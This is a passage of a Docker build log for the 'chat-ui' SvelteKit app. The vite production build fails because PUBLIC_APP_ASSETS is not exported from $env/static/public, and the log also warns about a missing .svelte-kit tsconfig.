CACHED [stage-2 3/5] COPY --from=builder-production /app/node_modules 0.0s\r\n => CACHED [stage-2 4/5] COPY --link --chown=1000 package.json /app/packa 0.0s\r\n => ERROR [builder 3/3] RUN --mount=type=secret,id=DOTENV_LOCAL,dst=.env. 3.7s\r\n------ \r\n > [builder 3/3] RUN --mount=type=secret,id=DOTENV_LOCAL,dst=.env.local npm run build: \r\n#0 0.622 \r\n#0 0.622 > chat-ui@0.3.0 build\r\n#0 0.622 > vite build\r\n#0 0.622 \r\n#0 0.831 \u25b2 [WARNING] Cannot find base config file \"./.svelte-kit/tsconfig.json\" [tsconfig.json]\r\n#0 0.831 \r\n#0 0.831 tsconfig.json:2:12:\r\n#0 0.831 2 \u2502 \"extends\": \"./.svelte-kit/tsconfig.json\",\r\n#0 0.831 \u2575 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n#0 0.831 \r\n#0 1.551 \r\n#0 1.551 vite v4.3.9 building SSR bundle for production...\r\n#0 1.583 transforming...\r\n#0 3.551 \u2713 165 modules transformed.\r\n#0 3.551 \u2713 built in 2.00s\r\n#0 3.551 \"PUBLIC_APP_ASSETS\" is not exported by \"$env/static/public\", imported by \"src/lib/components/icons/Logo.svelte\".\r\n#0 3.551 file: /app/src/lib/components/icons/Logo.svelte:3:10\r\n#0 3.551 1: